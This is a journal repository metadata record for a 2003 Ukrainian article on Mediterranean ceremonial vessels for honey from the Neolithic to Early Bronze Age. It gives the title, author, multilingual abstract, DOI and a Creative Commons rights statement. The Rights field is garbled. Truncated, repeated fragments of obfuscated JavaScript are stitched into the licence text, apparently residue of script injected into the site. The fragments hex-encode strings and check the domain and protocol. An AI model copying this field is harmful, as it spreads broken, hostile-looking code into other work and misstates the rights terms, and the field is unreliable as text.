Запис Детальніше

Mediterranean crockery for honey of neolithic - early bronze period

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title Mediterranean crockery for honey of neolithic - early bronze period
Средиземноморская посуда для меда времен неолита - ранней бронзы
Середземноморський посуд для меду доби неоліту - ранньої бронзи
 
Creator Триколенко, О. В.; Національний авіаційний університет
 
Subject

UDC 903.23


УДК 903.23


УДК 903.23
 
Description In the article is proved existence of the special dinner, ceremonial and ritual crockery for honey in Aegean world and in Eastern European cultures of essential Mediterranean influence during the time of Neolithic - Early Bronze
Рассмотрена посуда, в том числе художественно выполненная, которая могла предназначаться для меда в егейском мире и культурах средиземноморского круга Восточной Европы и использоваться в обрядах и ритуалах времен неолита - ранней бронзы
Розглянуто можливість існування спеціального столового, обрядового, ритуального посуду для меду в егейському світі та культурах значного середземноморського впливу Східної Європи за доби неоліту-ранньої бронзи
 
Publisher National Aviation University
 
Contributor


 
Date 2017-06-29
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/11657
10.18372/2306-1472.16.11657
 
Source Proceedings of the National Aviation University; Том 16, № 1 (2003); 160-171
Вестник Национального авиационного университета; Том 16, № 1 (2003); 160-171
Вісник Національного Авіаційного Університету; Том 16, № 1 (2003); 160-171
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e